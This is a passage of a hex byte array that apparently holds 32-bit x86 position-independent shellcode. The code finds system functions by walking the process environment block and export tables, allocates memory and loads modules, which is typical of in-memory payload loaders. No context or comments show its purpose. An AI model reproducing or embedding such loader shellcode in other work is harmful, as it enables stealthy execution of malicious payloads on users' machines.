61 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xcc, 0xff, 0xd0, 0x83,
62 0xec, 0x10, 0x89, 0x45, 0xc0, 0x83, 0x7d, 0xc0, 0x00, 0x75, 0x27, 0x8b,
63 0x45, 0x08, 0x8b, 0x80, 0x00, 0x02, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x75,
64 0x0f, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xc4, 0xff,
65 0xd0, 0x83, 0xec, 0x04, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0x35, 0x07,
66 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x00, 0x89, 0x44, 0x24, 0x08, 0x8b,
67 0x45, 0x08, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0xc0, 0x89, 0x04, 0x24,
68 0xe8, 0x61, 0x51, 0x00, 0x00, 0x8b, 0x45, 0xc0, 0x89, 0x45, 0x08, 0xc7,
69 0x44, 0x24, 0x08, 0x20, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00,
70 0x00, 0x00, 0x00, 0x8d, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x89, 0x04, 0x24,
71 0xe8, 0x0f, 0x51, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x04, 0x02,
72 0x00, 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x85, 0x9e, 0x00, 0x00, 0x00, 0x8b,
73 0x45, 0x08, 0x05, 0x10, 0x02, 0x00, 0x00, 0x89, 0x45, 0xbc, 0x8b, 0x45,
74 0x08, 0x8b, 0x00, 0x8d, 0x88, 0xf0, 0xfd, 0xff, 0xff, 0x8b, 0x45, 0x08,
75 0x8d, 0x58, 0x14, 0x8b, 0x45, 0x08, 0x8d, 0x50, 0x04, 0x89, 0x4c, 0x24,
76 0x0c, 0x8b, 0x45, 0xbc, 0x89, 0x44, 0x24, 0x08, 0x89, 0x5c, 0x24, 0x04,
77 0x89, 0x14, 0x24, 0xe8, 0xae, 0x5b, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
78 0x50, 0x2c, 0x8b, 0x40, 0x28, 0x8b, 0x4d, 0x08, 0x81, 0xc1, 0x00, 0x0c,
79 0x00, 0x00, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x89, 0x0c,
80 0x24, 0xe8, 0x78, 0x58, 0x00, 0x00, 0x89, 0x45, 0xb0, 0x89, 0x55, 0xb4,
81 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x04, 0x0d, 0x00, 0x00, 0x8b, 0x80, 0x00,
82 0x0d, 0x00, 0x00, 0x89, 0xc3, 0x33, 0x5d, 0xb0, 0x89, 0x9d, 0x60, 0xfe,
83 0xff, 0xff, 0x89, 0xd0, 0x33, 0x45, 0xb4, 0x89, 0x85, 0x64, 0xfe, 0xff,
84 0xff, 0x8b, 0x8d, 0x60, 0xfe, 0xff, 0xff, 0x8b, 0x9d, 0x64, 0xfe, 0xff,
85 0xff, 0x89, 0xd8, 0x09, 0xc8, 0x85, 0xc0, 0x0f, 0x85, 0xf3, 0x04, 0x00,
86 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x48, 0x28, 0x8b, 0x58, 0x2c, 0x8b, 0x45,
87 0x08, 0x8b, 0x50, 0x34, 0x8b, 0x40, 0x30, 0x89, 0x4c, 0x24, 0x0c, 0x89,
88 0x5c, 0x24, 0x10, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8b,
89 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x2c, 0x0e, 0x00, 0x00, 0x8b, 0x55,
90 0x08, 0x89, 0x42, 0x30, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x30, 0x85, 0xc0,
91 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0xff, 0x05, 0x00, 0x00,
92 0x8b, 0x45, 0x08, 0x05, 0x14, 0x02, 0x00, 0x00, 0x89, 0x45, 0xdc, 0xc7,
93 0x45, 0xe4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x1c, 0x8b, 0x55, 0xdc, 0x8b,
94 0x45, 0xe4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x8d, 0x8d, 0x74, 0xfe, 0xff,
95 0xff, 0x8b, 0x55, 0xe4, 0x01, 0xca, 0x88, 0x02, 0x83, 0x45, 0xe4, 0x01,
96 0x8b, 0x55, 0xdc, 0x8b, 0x45, 0xe4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84,
97 0xc0, 0x74, 0x18, 0x8b, 0x55, 0xdc, 0x8b, 0x45, 0xe4, 0x01, 0xd0, 0x0f,
98 0xb6, 0x00, 0x3c, 0x3b, 0x74, 0x09, 0x81, 0x7d, 0xe4, 0x03, 0x01, 0x00,
99 0x00, 0x76, 0xbd, 0x83, 0x7d, 0xe4, 0x00, 0x74, 0x2e, 0x8b, 0x45, 0xe4,
100 0x83, 0xc0, 0x01, 0x01, 0x45, 0xdc, 0x8d, 0x95, 0x74, 0xfe, 0xff, 0xff,
101 0x8b, 0x45, 0xe4, 0x01, 0xd0, 0xc6, 0x00, 0x00, 0x8d, 0x85, 0x74, 0xfe,
102 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
103 0xe8, 0xeb, 0x08, 0x00, 0x00, 0xeb, 0x80, 0x90, 0xc7, 0x45, 0xe4, 0x01,
104 0x00, 0x00, 0x00, 0xe9, 0x96, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
105 0x48, 0x28, 0x8b, 0x58, 0x2c, 0x8b, 0x45, 0x08, 0x8b, 0x55, 0xe4, 0x83,
106 0xc2, 0x06, 0x8d, 0x14, 0xd0, 0x8b, 0x02, 0x8b, 0x52, 0x04, 0x89, 0x4c,
107 0x24, 0x0c, 0x89, 0x5c, 0x24, 0x10, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54,
108 0x24, 0x08, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x45, 0x0d, 0x00,
109 0x00, 0x8b, 0x55, 0x08, 0x8b, 0x4d, 0xe4, 0x83, 0xc1, 0x0c, 0x89, 0x04,
110 0x8a, 0x8b, 0x45, 0x08, 0x8b, 0x55, 0xe4, 0x83, 0xc2, 0x0c, 0x8b, 0x04,
111 0x90, 0x85, 0xc0, 0x75, 0x41, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x7c, 0x01,
112 0x00, 0x00, 0x8b, 0x80, 0x78, 0x01, 0x00, 0x00, 0x89, 0x45, 0xd0, 0x89,
113 0x55, 0xd4, 0x8b, 0x45, 0x08, 0x8b, 0x55, 0xe4, 0x83, 0xc2, 0x06, 0x8d,
114 0x14, 0xd0, 0x8b, 0x02, 0x8b, 0x52, 0x04, 0x89, 0xc3, 0x33, 0x5d, 0xd0,
115 0x89, 0xde, 0x89, 0xd0, 0x33, 0x45, 0xd4, 0x89, 0xc7, 0x89, 0xf8, 0x09,
116 0xf0, 0x85, 0xc0, 0x0f, 0x85, 0x86, 0x03, 0x00, 0x00, 0x90, 0x83, 0x45,
117 0xe4, 0x01, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x10, 0x02, 0x00, 0x00, 0x39,
118 0x45, 0xe4, 0x0f, 0x82, 0x58, 0xff, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b,
119 0x80, 0xf4, 0x08, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x21, 0x8b, 0x45,
120 0x08, 0x89, 0x04, 0x24, 0xe8, 0x5c, 0x0d, 0x00, 0x00, 0x85, 0xc0, 0x0f,
121 0x84, 0x51, 0x03, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x30, 0x0d,
122 0x00, 0x00, 0x89, 0x45, 0xe0, 0xeb, 0x2b, 0x8b, 0x45, 0x08, 0x8b, 0x80,
123 0xf4, 0x08, 0x00, 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x84, 0x34, 0x03, 0x00,
124 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xf4, 0x08, 0x00, 0x00, 0x83, 0xf8,
125 0x01, 0x75, 0x0b, 0x8b, 0x45, 0x08, 0x05, 0x30, 0x0d, 0x00, 0x00, 0x89,
126 0x45, 0xe0, 0xc7, 0x44, 0x24, 0x0c, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44,
127 0x24, 0x08, 0x00, 0x30, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0xa4, 0x0f,
128 0x00, 0x00, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xcc,
129 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89, 0x45, 0xd8, 0x8b, 0x45, 0xd8, 0xba,
130 0x00, 0x00, 0x00, 0x00, 0x8b, 0x4d, 0x08, 0x89, 0x81, 0xf8, 0x01, 0x00,
131 0x00, 0x89, 0x91, 0xfc, 0x01, 0x00, 0x00, 0x83, 0x7d, 0xd8, 0x00, 0x75,
132 0x27, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x00, 0x02, 0x00, 0x00, 0x83, 0xf8,
133 0x02, 0x75, 0x0f, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
134 0xc4, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9,
135 0xf7, 0x03, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x44, 0x05, 0x00,
136 0x00, 0x83, 0xf8, 0x01, 0x74, 0x72, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
137 0xe8, 0x82, 0x47, 0x00, 0x00, 0x89, 0x45, 0xac, 0x83, 0x7d, 0xac, 0x00,
138 0x75, 0x12, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x44, 0x05, 0x00, 0x00, 0x83,
139 0xf8, 0x02, 0x0f, 0x84, 0x7c, 0x02, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x89,
140 0x04, 0x24, 0xe8, 0xa2, 0x49, 0x00, 0x00, 0x89, 0x45, 0xac, 0x83, 0x7d,
141 0xac, 0x00, 0x75, 0x12, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x44, 0x05, 0x00,
142 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84, 0x59, 0x02, 0x00, 0x00, 0x8b, 0x45,
143 0x08, 0x89, 0x04, 0x24, 0xe8, 0x86, 0x49, 0x00, 0x00, 0x89, 0x45, 0xac,
144 0x83, 0x7d, 0xac, 0x00, 0x75, 0x12, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x44,
145 0x05, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84, 0x36, 0x02, 0x00, 0x00,
146 0x8b, 0x45, 0xe0, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x01, 0x0f, 0x84, 0x5b,
147 0x01, 0x00, 0x00, 0xc7, 0x85, 0x78, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00,
148 0x00, 0x8b, 0x45, 0xe0, 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x05, 0x2f,
149 0x15, 0x00, 0x00, 0x25, 0x00, 0xf0, 0xff, 0xff, 0x89, 0x85, 0x70, 0xfe,
150 0xff, 0xff, 0x8b, 0x45, 0xd8, 0x89, 0x44, 0x24, 0x18, 0xc7, 0x44, 0x24,
151 0x14, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x30, 0x00,
152 0x00, 0x8d, 0x85, 0x70, 0xfe, 0xff, 0xff, 0x89, 0x44, 0x24, 0x0c, 0xc7,
153 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x78, 0xff, 0xff,
154 0xff, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff,
155 0xe8, 0x8b, 0x53, 0x00, 0x00, 0x89, 0x45, 0xa8, 0x83, 0x7d, 0xa8, 0x00,
156 0x0f, 0x88, 0xbb, 0x01, 0x00, 0x00, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff,
157 0xc7, 0x44, 0x24, 0x08, 0x30, 0x05, 0x00, 0x00, 0x8b, 0x55, 0xe0, 0x89,
158 0x54, 0x24, 0x04, 0x89, 0x04, 0x24, 0xe8, 0x23, 0x4d, 0x00, 0x00, 0x8b,
159 0x45, 0xe0, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x03, 0x74, 0x0f, 0x8b, 0x45,
160 0xe0, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x04, 0x0f, 0x85, 0x81, 0x00, 0x00,
161 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x04, 0x01, 0x00, 0x00, 0x8b, 0x45,
162 0xe0, 0x8b, 0x98, 0x20, 0x05, 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x05, 0x28,
163 0x05, 0x00, 0x00, 0x89, 0x85, 0x60, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xe0,
164 0x8b, 0x88, 0x24, 0x05, 0x00, 0x00, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff,
165 0x8d, 0xb8, 0x28, 0x05, 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x8b, 0x40, 0x08,
166 0x83, 0xe8, 0x01, 0x80, 0xcc, 0x01, 0x0f, 0xb7, 0xc0, 0x8d, 0x75, 0x9c,
167 0x89, 0x74, 0x24, 0x14, 0x89, 0x5c, 0x24, 0x10, 0x8b, 0xb5, 0x60, 0xfe,
168 0xff, 0xff, 0x89, 0x74, 0x24, 0x0c, 0x89, 0x4c, 0x24, 0x08, 0x89, 0x7c,
169 0x24, 0x04, 0x89, 0x04, 0x24, 0xff, 0xd2, 0x83, 0xec, 0x18, 0x89, 0x45,
170 0xa4, 0x83, 0x7d, 0xa4, 0x00, 0x0f, 0x85, 0x11, 0x01, 0x00, 0x00, 0x8b,
171 0x85, 0x78, 0xff, 0xff, 0xff, 0x89, 0x45, 0xe0, 0xeb, 0x34, 0x8b, 0x45,
172 0xe0, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x02, 0x75, 0x29, 0x8b, 0x85, 0x78,
173 0xff, 0xff, 0xff, 0x8d, 0x90, 0x28, 0x05, 0x00, 0x00, 0x8b, 0x45, 0xe0,
174 0x05, 0x28, 0x05, 0x00, 0x00, 0x89, 0x54, 0x24, 0x04, 0x89, 0x04, 0x24,
175 0xe8, 0xbd, 0x49, 0x00, 0x00, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff, 0x89,
176 0x45, 0xe0, 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x83, 0xf8, 0x03, 0x74, 0x0a,
177 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x83, 0xf8, 0x04, 0x75, 0x17, 0x8b, 0x45,
178 0xe0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8,
179 0xd0, 0x1d, 0x00, 0x00, 0xe9, 0xab, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe0,
180 0x8b, 0x00, 0x83, 0xf8, 0x01, 0x74, 0x0a, 0x8b, 0x45, 0xe0, 0x8b, 0x00,
181 0x83, 0xf8, 0x02, 0x75, 0x53, 0x8d, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x89,
182 0x44, 0x24, 0x08, 0x8b, 0x45, 0xe0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45,
183 0x08, 0x89, 0x04, 0x24, 0xe8, 0xcc, 0x11, 0x00, 0x00, 0x85, 0xc0, 0x74,
184 0x1c, 0x8d, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x8b,
185 0x45, 0xe0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
186 0xe8, 0xbe, 0x15, 0x00, 0x00, 0x8d, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x89,
187 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x9f, 0x1b,
188 0x00, 0x00, 0xeb, 0x44, 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x83, 0xf8, 0x05,
189 0x74, 0x0a, 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x83, 0xf8, 0x06, 0x75, 0x2f,
190 0x8b, 0x45, 0xe0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04,
191 0x24, 0xe8, 0x1c, 0x34, 0x00, 0x00, 0xeb, 0x1c, 0x90, 0xeb, 0x19, 0x90,
192 0xeb, 0x16, 0x90, 0xeb, 0x13, 0x90, 0xeb, 0x10, 0x90, 0xeb, 0x0d, 0x90,
193 0xeb, 0x0a, 0x90, 0xeb, 0x07, 0x90, 0xeb, 0x04, 0x90, 0xeb, 0x01, 0x90,
194 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xf4, 0x08, 0x00, 0x00, 0x83, 0xf8, 0x02,
195 0x74, 0x12, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xf4, 0x08, 0x00, 0x00, 0x83,
196 0xf8, 0x03, 0x0f, 0x85, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
197 0x80, 0x30, 0x0d, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x77, 0x8b, 0x45, 0x08,
198 0x8b, 0x90, 0x2c, 0x0d, 0x00, 0x00, 0x8b, 0x80, 0x28, 0x0d, 0x00, 0x00,
199 0x89, 0xc2, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x30, 0x0d, 0x00, 0x00, 0x89,
200 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89,
201 0x04, 0x24, 0xe8, 0xf5, 0x4a, 0x00, 0x00, 0xc7, 0x85, 0x70, 0xfe, 0xff,
202 0xff, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8d, 0x90, 0x30, 0x0d,
203 0x00, 0x00, 0x8b, 0x45, 0xd8, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24,
204 0x0c, 0x00, 0x80, 0x00, 0x00, 0x8d, 0x85, 0x70, 0xfe, 0xff, 0xff, 0x89,
205 0x44, 0x24, 0x08, 0x89, 0x54, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff,
206 0xff, 0xff, 0xe8, 0x40, 0x51, 0x00, 0x00, 0x8b, 0x45, 0x08, 0xc7, 0x80,
207 0x30, 0x0d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
208 0x80, 0x00, 0x02, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x94, 0xc0, 0x0f,
209 0xb6, 0xc0, 0x89, 0x45, 0xa0, 0x8b, 0x45, 0x08, 0x8b, 0x00, 0x89, 0x44,
210 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
211 0x08, 0x89, 0x04, 0x24, 0xe8, 0x7b, 0x4a, 0x00, 0x00, 0x8b, 0x45, 0x08,
212 0x8b, 0x90, 0xfc, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00,
213 0xc7, 0x44, 0x24, 0x08, 0x00, 0xc0, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04,
214 0x00, 0x00, 0x00, 0x00, 0x89, 0x04, 0x24, 0x8b, 0x45, 0xc8, 0xff, 0xd0,
215 0x83, 0xec, 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x00, 0xc0, 0x00, 0x00, 0xc7,
216 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x89, 0x04,
217 0x24, 0x8b, 0x45, 0xc8, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x83, 0x7d, 0xa0,
218 0x00, 0x74, 0x0f, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
219 0xc4, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x8d,
220 0x65, 0xf4, 0x5b, 0x5e, 0x5f, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec,
221 0x28, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x48, 0xc7, 0x44, 0x24, 0x14, 0x00,
222 0x01, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x89, 0x54, 0x24, 0x10, 0xc7, 0x44,
223 0x24, 0x0c, 0xff, 0xff, 0xff, 0xff, 0x8b, 0x55, 0x0c, 0x89, 0x54, 0x24,
224 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24,
225 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec, 0x18, 0xc9, 0xc3, 0x55,
226 0x89, 0xe5, 0x83, 0xec, 0x38, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00,
227 0xc7, 0x45, 0xdc, 0x18, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xdc, 0x64, 0x8b,
228 0x00, 0x89, 0x45, 0xd8, 0x8b, 0x45, 0xd8, 0x8b, 0x40, 0x30, 0x89, 0x45,
229 0xec, 0x8b, 0x45, 0xec, 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xe8, 0x8b, 0x45,
230 0xe8, 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xf4, 0xeb, 0x40, 0x8b, 0x45, 0xf4,
231 0x8b, 0x40, 0x18, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xe4, 0x3b, 0x45, 0x0c,
232 0x74, 0x26, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
233 0x14, 0x89, 0x44, 0x24, 0x08, 0x8b, 0x45, 0xe4, 0x89, 0x44, 0x24, 0x04,
234 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x68, 0x00, 0x00, 0x00, 0x89,
235 0x45, 0xf0, 0xeb, 0x01, 0x90, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x45,
236 0xf4, 0x8b, 0x45, 0xf4, 0x8b, 0x40, 0x18, 0x85, 0xc0, 0x74, 0x06, 0x83,
237 0x7d, 0xf0, 0x00, 0x74, 0xb0, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x3f, 0x8b,
238 0x45, 0x10, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
239 0xe8, 0x8b, 0x02, 0x00, 0x00, 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xe0, 0x00,
240 0x74, 0x1d, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x34, 0x8b, 0x55, 0x14, 0x89,
241 0x54, 0x24, 0x04, 0x8b, 0x55, 0xe0, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
242 0xec, 0x08, 0x89, 0x45, 0xf0, 0xeb, 0x07, 0xc7, 0x45, 0xf0, 0x00, 0x00,
243 0x00, 0x00, 0x8b, 0x45, 0xf0, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x81, 0xec,
244 0xd8, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0x83,
245 0x7d, 0x0c, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x37,
246 0x02, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0xe8,
247 0x8b, 0x40, 0x3c, 0x89, 0xc2, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45,
248 0xe4, 0x8b, 0x45, 0xe4, 0x83, 0xc0, 0x78, 0x89, 0x45, 0xe0, 0x8b, 0x45,
249 0xe0, 0x8b, 0x00, 0x89, 0x45, 0xdc, 0x83, 0x7d, 0xdc, 0x00, 0x75, 0x0a,
250 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x00, 0x02, 0x00, 0x00, 0x8b, 0x55,
251 0x0c, 0x8b, 0x45, 0xdc, 0x01, 0xd0, 0x89, 0x45, 0xd8, 0x8b, 0x45, 0xd8,
252 0x8b, 0x50, 0x1c, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xd4, 0x8b,
253 0x45, 0xd8, 0x8b, 0x50, 0x20, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45,
254 0xd0, 0x8b, 0x45, 0xd8, 0x8b, 0x50, 0x24, 0x8b, 0x45, 0x0c, 0x01, 0xd0,
255 0x89, 0x45, 0xcc, 0x83, 0x7d, 0x10, 0x00, 0x0f, 0x84, 0x8b, 0x00, 0x00,
256 0x00, 0x8b, 0x45, 0xd8, 0x8b, 0x40, 0x18, 0x89, 0x45, 0xf0, 0x83, 0x7d,
257 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xa8, 0x01,
258 0x00, 0x00, 0x8b, 0x45, 0xf0, 0x05, 0xff, 0xff, 0xff, 0x3f, 0x8d, 0x14,
259 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd0, 0x01, 0xd0, 0x8b, 0x10,
260 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xc8, 0x8b, 0x45, 0x10, 0x89,
261 0x44, 0x24, 0x04, 0x8b, 0x45, 0xc8, 0x89, 0x04, 0x24, 0xe8, 0x6a, 0x49,
262 0x00, 0x00, 0x85, 0xc0, 0x75, 0x2c, 0x8b, 0x45, 0xf0, 0x05, 0xff, 0xff,
263 0xff, 0x7f, 0x8d, 0x14, 0x00, 0x8b, 0x45, 0xcc, 0x01, 0xd0, 0x0f, 0xb7,
264 0x00, 0x0f, 0xb7, 0xc0, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b,
265 0x45, 0xd4, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89,
266 0x45, 0xf4, 0x83, 0x6d, 0xf0, 0x01, 0x83, 0x7d, 0xf0, 0x00, 0x74, 0x29,
267 0x83, 0x7d, 0xf4, 0x00, 0x74, 0x90, 0xeb, 0x21, 0x8b, 0x45, 0xd8, 0x8b,
268 0x50, 0x10, 0x8b, 0x45, 0x14, 0x29, 0xd0, 0x8d, 0x14, 0x85, 0x00, 0x00,
269 0x00, 0x00, 0x8b, 0x45, 0xd4, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0x0c,
270 0x01, 0xd0, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x3b, 0x45, 0xd8, 0x0f,
271 0x82, 0x06, 0x01, 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x8b, 0x50, 0x04, 0x8b,
272 0x45, 0xd8, 0x01, 0xd0, 0x39, 0x45, 0xf4, 0x0f, 0x83, 0xf2, 0x00, 0x00,
273 0x00, 0x8b, 0x45, 0xf4, 0x89, 0x45, 0xc4, 0xc7, 0x45, 0xec, 0x00, 0x00,
274 0x00, 0x00, 0xeb, 0x28, 0x8b, 0x55, 0xc4, 0x8b, 0x45, 0xec, 0x01, 0xd0,
275 0x0f, 0xb6, 0x00, 0x8d, 0x4d, 0x84, 0x8b, 0x55, 0xec, 0x01, 0xca, 0x88,
276 0x02, 0x8b, 0x55, 0xc4, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6, 0x00,
277 0x3c, 0x2e, 0x74, 0x1b, 0x83, 0x45, 0xec, 0x01, 0x8b, 0x55, 0xc4, 0x8b,
278 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x09, 0x83,
279 0x7d, 0xec, 0x3b, 0x76, 0xc3, 0xeb, 0x01, 0x90, 0x8b, 0x45, 0xec, 0x83,
280 0xc0, 0x01, 0xc6, 0x44, 0x05, 0x84, 0x64, 0x8b, 0x45, 0xec, 0x83, 0xc0,
281 0x02, 0xc6, 0x44, 0x05, 0x84, 0x6c, 0x8b, 0x45, 0xec, 0x83, 0xc0, 0x03,
282 0xc6, 0x44, 0x05, 0x84, 0x6c, 0x8b, 0x45, 0xec, 0x83, 0xc0, 0x04, 0xc6,
283 0x44, 0x05, 0x84, 0x00, 0x8b, 0x45, 0xec, 0x83, 0xc0, 0x01, 0x01, 0x45,
284 0xc4, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x1c, 0x8b, 0x55,
285 0xc4, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x8d, 0x8d, 0x44,
286 0xff, 0xff, 0xff, 0x8b, 0x55, 0xec, 0x01, 0xca, 0x88, 0x02, 0x83, 0x45,
287 0xec, 0x01, 0x8b, 0x55, 0xc4, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6,
